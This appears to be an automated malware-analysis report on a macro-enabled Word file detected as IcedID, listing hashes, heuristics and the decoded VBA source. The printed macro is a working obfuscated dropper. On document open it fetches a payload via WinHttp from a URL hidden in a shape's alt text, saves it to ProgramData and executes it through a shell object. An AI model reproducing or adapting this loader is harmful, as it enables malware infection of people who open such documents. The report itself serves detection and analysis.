Office (OOXML) malware analysis — malicious · 7242e1aa62b78d16

MALICIOUS

Office (OOXML)

100.3 KB Created: 2020-10-19 09:41:00 UTC Authoring application: Microsoft Office Word 16.0000 First seen: 2020-10-25

MD5: e4270855ce6f8e43d1b6b4bb1030fb25 SHA-1: 2d7a501b217c2e83a90d05a6d5f36c3f9a29d5fb SHA-256: 7242e1aa62b78d16cc5c8a72ed5d22789f360c85c67df87b0d8db4d3f4ecc51b

290 Risk Score

Heuristics 7

ClamAV: Doc.Macro.ICEID1020-9781212-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Macro.ICEID1020-9781212-0
VBA project inside OOXML medium 4 related findings OOXML_VBA

Document contains a VBA project — VBA macros present
Potential Shell call in VBA critical OLE_VBA_SHELL

Potential Shell call in VBA
Matched line in script
```
Set SDKUr = CreateObject(REPwt + "." + "shell")
```
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
Matched line in script
```
Set DEpxX = VBA.CreateObject(fJYHb + "" + JfrJY)
```
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Triggers on the COMBINATION of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) AND a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it — it is the pairing that flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
AutoOpen macro low OLE_VBA_AUTOOPEN

AutoOpen macro
Matched line in script
```
Sub AutoOpen()
```
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2014/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/9/8/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2015/10/21/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/9/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/10/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/11/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/12/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/13/chartexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/5/14/chartexIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2016/inkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/drawing/2017/model3dIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/mathIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawingIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/wordprocessingml/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2012/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordml/cexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2016/wordml/cidIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2018/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2015/wordml/symexIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingGroupIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingInkIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2006/wordmlIn document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/word/2010/wordprocessingShapeIn document text (OOXML body / shared strings)

Extracted artifacts 2

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source from OOXML)	13982 bytes
SHA-256: `71af74ce9a828a44914d6c1c504966d4a3f47d887bf73e463058e57552a497f3`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Attribute VB_Name = "XPtmE" Sub WMEez(TZVbA, Optional ByVal GypzO As String = "c:\programdata\PBgKx.txt", Optional ByVal JfrJY As String = "systemobject") ' Birdwatchers killings ' Vulgarity lime ' Accordions unscrewed intersections hubbub ' Aces appalled ' Unstructured clench formed ' Fledges mantelshelf apocalypse ' Evaluated condemnatory libretto ' Ramrod iraqi exclaim inhumanly ' Skulking coordinate freezer ' Carelessly pillory spat belched ' Reversed fumble haughty earldom pony ' Courtroom fluorescence ' Addle recriminate ' Reproached knob courtier intercepting ' Submersion kickstarts stator teeniest stagnated ' Enacting inscribe malformations doldrums ' Conscientious triffids fences inconstancy ' Intemperate inept militancy ' Stunt battlefield ' Sentenced knowing ' Scalable escapades millibars roadshow illtempered asters ' Blueness politeness anthrax alright plaintiffs typeface Set DEpxX = VBA.CreateObject(fJYHb + "" + JfrJY) ' Founder therapists ' Undercarriage couturier speakers galas ' Testily neater unready ' Rear bagging remarry parental iambic lover ' Prevails downland Set wDypC = DEpxX.CreateTextFile(GypzO) ' Orthographic rapturous ocelot intimidating adlib ' Unprofessional charming ruiner sublime baptisms lawn ' Longing wraths ' Stenches allocator vituperate limo ' Physio slovenliness asunder ' Lambent purposeless kiss values purification ' Conjugating ejected rosebuds geographer wDypC.WriteLine TZVbA ' Tiptoed ' Stilt enrage ' Shuddering antlions midwives ' Umpteen cist ' Prior orca vibrating ' Buttoning spurred personal ' Reinstall exogenous organisation flicked cite wDypC.Close ' Deadlier focal poplar lexicographical tempers ' Ordinal adduce calmly emulsifies ' Unclassifiable whacker prompt marinated wraiths brutality ' Dermic righthander ' Concatenates affinities geographically necrophiliacs auditing ' Pithiest silting ' Droopingly mountaineers disgorge bloodstained ' Creaks hostelries chromed chauvinistic ' Proportionately commenting exchequer ' Rehashing sojourns ' Electrocuted vitiate emotionally ' Wrongful petulance twinkle ' Brief millisecond solo decompressed ' Grammarian repudiating fealty determinism hollyhocks ' Doze upholding ombudsman translating warhorse ' Cartel unsought interleaving whereabouts conventionalist ' Geochemistry thence unfriendly restless ' Insubordinate sportsmanship cortex ' Artist annoying moleskin firearms reticent cycloid ' Tonight interpellation tinkled quantifying maths ' Alibaba swamps antithetic undiscovered legality earphones ' Undeservedly ambitious abnormality steeplejack ' Affirm importer ' Juicier chlamydia motet ' Envelopers powerful befalling invited ' Sherds decreeing throws unbowed furrier ' Lur fang divisive crawlers ' Unheroic filch shivered infelicities ' Benign commercialism ' Thousandfold row aperitifs ' Deflated mindless ' Phospholipids linage bullet ' Eg grinding algerian rebind saddling ' Luxury steer ' Gestural garbs hangars heterozygous yogi ' Hyacinth tori wasp ' Pool pingpong mongoose hurling thither bioengineering ' Tensions snorted courtyard usurpation galvanise End Sub ' Computerliterate misreading edifice forks march ' Forgetful syntax ' Radiated cosiness ' Hieroglyphs aesthete resuscitated sceptical ' Lightheadedness empires bronzed juggernaut heavier abattoirs Sub AutoOpen() ' Skip webs suppliant ' Cleaning overprinted rolypoly overcommitments ' Hurls carburettors evaluator integrals ' Derelict ' Evidently overdressed biasing ploys ' Darkening armchair refinance soundproofed ' Comedown ' Convulsions ' Precociously wisdoms undeclared ' Appertaining ails ' Globed hypercube grains ' Appraise chequering enigma cats ' Radical enfolding ' Camelhair headship owned toymaker busier sisterinlaw ' Cedars amphibians conducting adjustable ' Affluence remind unshaped amplification ' Censoring juggernaut throttling spaded ' Nonevent twigged ' Swathes economic wellplaced ' Lengthier historiographical protectionism silicate ' Chasms ' Comforting ' Chronically issuable lowish ' Idiotically ' Aluminium unfaithfulness clawed regimental tuition ' Paternal entirety Dim vkQOC As New IfIHh ' Stators considerable owner cathode detected interest ' Mistranslating toenails ' Conductor openheart quantisation sparring misled ' Aerobically emasculate ' Anaesthetised scam exactitude ' Cramps downpours tweeter ' Promiscuity challenge kiev coriander CMrju = "" ' Gemstones trickle fury heated sidelight ruffled molehills ' Opponents ' Strenuous wiles ' Bereaved ' Massproducing floozies degenerating yellowish ' Fuller lidded ' Singers prays obtuse merman ' Copycats cursive worn ' Inclines ' Raking impinged stovepipe ' Composers ' Childbirth ailing ' Hanggliders proforma mixed mitochondrial unkind TZVbA = vkQOC.HqGfq(bkQTc) ' Footplate progress extenuating idealised ' Ancient northernmost gauze enjoyability ' Festival sage ' Pincushions alcohols ' Obstructiveness ukulele policy tonsil callable ' Officer bap ' Wallets pompey scouring utterance WMEez aHBvM(TZVbA) ' Accuracies interprets aussies presupposes adulation arabesque ' Blankly accessed praiseworthy glut redeclaration ' Fling unmeasurable despots ' Geyser squinting liquor guessed autocue ' Chauvinist cyprus breathes rut passion veldt misprinting ' Interruptibility rotunda ' Sydney demonstrative ridiculed eg scrapers ' Muzak charter cybernetics backless remand faxed ' Pickle stingier charitable ' Pirouettes ' Wildness velodrome ' Unreformed jar bandstand scimitar ghostlike MILHj fsxAY(0) + "vr32 c:\programdata\PBgKx.txt", "wscript" End Sub Function Tilhj(gBTuI, EzWXj) ' Rating intimate ignorantly ' Powering cased ' Hornpipes illiterates outpace governs spartans probabilistically ' Ransoms ' Lettering sagged mulled snug Tilhj = Split(gBTuI, EzWXj) End Function Attribute VB_Name = "igdAD" ' Dreamland disconnections philological uninspired subprograms ' Longitudinal aneurysms ' Tug interceptor villainy ' Dining cannabis virginity carpeted cherubic ' Entrancing drinkers ' Selfrighteousness ' Sauntering storeman smooth ' Glaringly intruders afar uncharacteristic gregarious Function aHBvM(IAkmO) ' Hideandseek punchcard inductive spiked ' Unsalted enforcements pickings outflank congratulating ' Conflagration ' Orderings adjourns marinas columbus ' Uneven tranquilly aHBvM = StrConv(IAkmO, vbUnicode) ' Bacilli ' Damsons deluge overloads ' Sad enervate trusses hark ' Widths foreshadowing bulgaria apotheosis runny harpsichords End Function ' Damaging hider parents ' Commanded ' Soundless ponderously ' Retrospectives donjuan interferer Function BBwPl() ' Park trikes ' Duty dyke spoke notoriety ' Enroll outmanoeuvre depreciating ' Concreted ' Vims ' Backers overspill initialled ' Defiles pretentiously photographs ennoble ' Onlybegotten ' Briefcases miraculously nympholepsy gesturing gentians ' Adolescent caption turkish pinups spurns ' Eider middling ' Serology stigmatise eccentricities ' Insuperable block figural conditioning shuns linens ' Polychromatic loophole selfishly With ActiveDocument.shapes(1) BBwPl = .AlternativeText End With End Function ' Ambivalence humpback annul rapturously prosodic apprehends ' Denotation crossbar ' Monographic unsmooth ' Theoretic ' Boasts stretcher watching slipup discharges rome slip absurd Function fsxAY(fxUzo) ' Balaclava reformulate auditions fanciful ' Mistime behaviourism reloading ' Whippet monstrous abuser hospital ' Sportive vocations ' Liquify inauthenticity dolorous burlier ' Detections wapiti ' Pestilential refreshed erroneously whereby borrower ' Drooling sonorously ' Photolytic libya ibex ' Terry breaches airflow ' Comments excited immunology ' Grandest coma raccoons wuMkw = Tilhj(BBwPl(), "~~~") qscyG = wuMkw(fxUzo) fsxAY = qscyG End Function Attribute VB_Name = "IfIHh" Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = False Attribute VB_Exposed = True Attribute VB_TemplateDerived = False Attribute VB_Customizable = False Function gSzet(NWNsm, lSuCC, aRHAi) ' Pacifism transcriptions imbecile creatures unkindness ' Bogy upkeep betrayals ' Lung switched smelled ' Doges contributors broadleaved sublunary palmtop ' Southward excusable gSzet = Mid(NWNsm, lSuCC, aRHAi) End Function Public Function ObyTP(zVmvq, PdIsX) ' Describer ' Disrupted suffers vegetational ' Lifestyles ' Candidly ' Collaborators disassembler ' Safest dismounted ' Glutinous sliders scurryings supercilious ' Unrepentant crumpets exhibiting ' Malaise republication shilling ' Betraying scrolling precaution ' Belts roughens speechifying agility ' Numerological proportionately achievements duomo ' Timescales rebury beseeching ' Ochres ' Teenagers spree asphyxiated emphasise ' Epigones candle kneeling pavilion FdLNj = Trim(zVmvq) For DwixC = PdIsX To Len(FdLNj) WeJdS = gSzet(FdLNj, DwixC, PdIsX) & WeJdS Next DwixC ObyTP = WeJdS End Function ' Buoyed saddlebags turnstiles stockpiling ' Grassroots pocked ' Slums clench daydreaming throwback belong ' Wizard scapula annexe acquits ' Coquettishly anaemia videophone mechanicals Function HqGfq(XyFjm) ' Literally allocated ' Dally underlining chronicling quantisation ' Gobbler federation esthetic laryngitis walled ' Loaders spectacularly persecutors linearised newsman hecklers ' Remanded flushed introspection awed ' Green Dim hwUhf As Object ' Assiduous ninefold ' Powdery mouldings workhouse soandso ' Freeholders forester riflemen regresses expectorated lettering ' Fecund kremlin lionised interpreted ' Dazing overthrew ' Spires unfairness amenable contends crenellations ' Froggy rashes silliest ' Philological jews ' Scoreboard developing monition muffling Set hwUhf = CreateObject(ObyTP(XyFjm, 1) + "." + ObyTP(XyFjm, 1) + "Request.5.1") ' Halt pedology runaway casters biophysical hundredfold ' Assuaging springbok bored ligatures bashful bagfuls ' Bounties vocative mercuric choreographer ' Chronicles ethnical readapt ' Formulator ' Ding upland seriously ' Welleducated boats reclamations ' Repel decriminalising ' Levering ' Stellar fright idles nutty embargo tolbooth useless ' Winningly majestically ' Coder sternly punishes revolved scaffolds limber ' Sevenpence ecuador ' Unemployable dryish charger discussion ' Juiciest wobbler geraniums heavings pattering ' Togo umpteenth rafts lunate ' Monotheist rostering calcutta sash ' Tapped compatibles avalanche walkabouts ' Thrum byte atheistically jasmine pears unformed sanctity zhXlP = fsxAY(1) ' Deliverers duckbill spaded ambitions ' Cosy situating trials particularity bang ' Appointment extends promiscuously devised adequately ' Wicks huddled victualling interpreting enrolment hwUhf.Open "GET", ObyTP(zhXlP, 1), False ' Structured asterisk sprouts ' Sterilisations mystique ' Anterior decaffeinated goers softspoken itched ' Bowls intelligibly vindictive scheduler ' Blindfolded capitulating softened ' Fruited reactionary ' Mellifluously collide hwUhf.Send ' Suffocating hare safaris ' Gymnastics hatchway pieces filings goatskin obsessing ' Solutes ransoming electrifying contriving ridicules beguile springboks total ' Handguns HqGfq = hwUhf.responsebody End Function Attribute VB_Name = "TOFkI" Public Const bkQTc As String = "ptthniw" Public Const fJYHb As String = "scripting.file" Sub MILHj(LZQZy, REPwt) ' Nonetheless resolved geocentric hammerhead shellfish padded ' Scoops pantaloons extol disagreements ' Criticised staphylococcus hours scudding ' Fleas equitably dwarfish ' Abdomen hayfever ' Upmost malformation ambler fluorocarbon ' Appertaining democratic transformed Set SDKUr = CreateObject(REPwt + "." + "shell") ' Intensifying woolly ' Harder ' Mocker manse ' Pools buckets disabling ' Shields electrocute redistributive glossed phlogiston ' Treats reasonably neighbourhood possessiveness ' Aspersion linchpin murk ' Reconverted compliant practitioners sideshow ' Tracksuit tariff daze clamped seriousness ' Overdoing bulged flinging strangers refuting ' Flirts assure ' Walkway parachute ' Wormholes glimpsing ' Falsifiable ' Burdened ' Aircrew stabilises pantry ' Annexing divans imperfectly ' Determinacy pulpy wagged ' Fictions motlier stomps laundress ' Redcross sublime ' Nitric unpalatable crystallised roosted ' Dormouse ' Stealer mafiosi lathers unemployed run ' Snowdrop useless submergence ' Swashbuckling access reincarnated ' Armbands excuse explicable ' Condolence parsings ' Spheroid corporals tropopause ' Preheat ruefully ' Passageway odour augurs gravitas ' Swaying brawniest graduates migrated redraft ' Thickset frisks beaten ' Puling pessimistic jarl waterway dispatched ' Demarcate reduces coordination adapted ' Imprisoning evaluated ' Mistyping ' Girded fretless colitis poled earring ' Outrage foams relapsed soudan noisiness idol recollected staplers ' Resend ' Stunning profiling judgments acceptances ' Horsewhip compatriots austere ' Abolished anticipate busting curtailing urbanity ' Shingle agouti ' Stomp pause ' Inhumane headmistresses ' Admin absolved sensed curfew cadge ' Sort conspiring safeguards ' Fondue corrupt ' Shell amniotic ramped Call SDKUr.exec(LZQZy) ' Unassailable ' Spleen tramlines diarrhoeal disinfection imbeds ' Diffusional lifesize aflame managing gardening ' Locale oscar chirps ' Worth fusible preceding like End Sub
`vbaProject_00.bin`	vba-project	OOXML VBA project: word/vbaProject.bin	49664 bytes
SHA-256: `6d4181e1a6d6dea66a33f40b9b066d4c6b01f90a3dd304dafe2bb4f0d8323d7b`
Detection ClamAV: Doc.Macro.ICEID1020-9781212-0 Obfuscation or payload: unlikely

Open this report in the interactive analyzer, or submit your own file for analysis.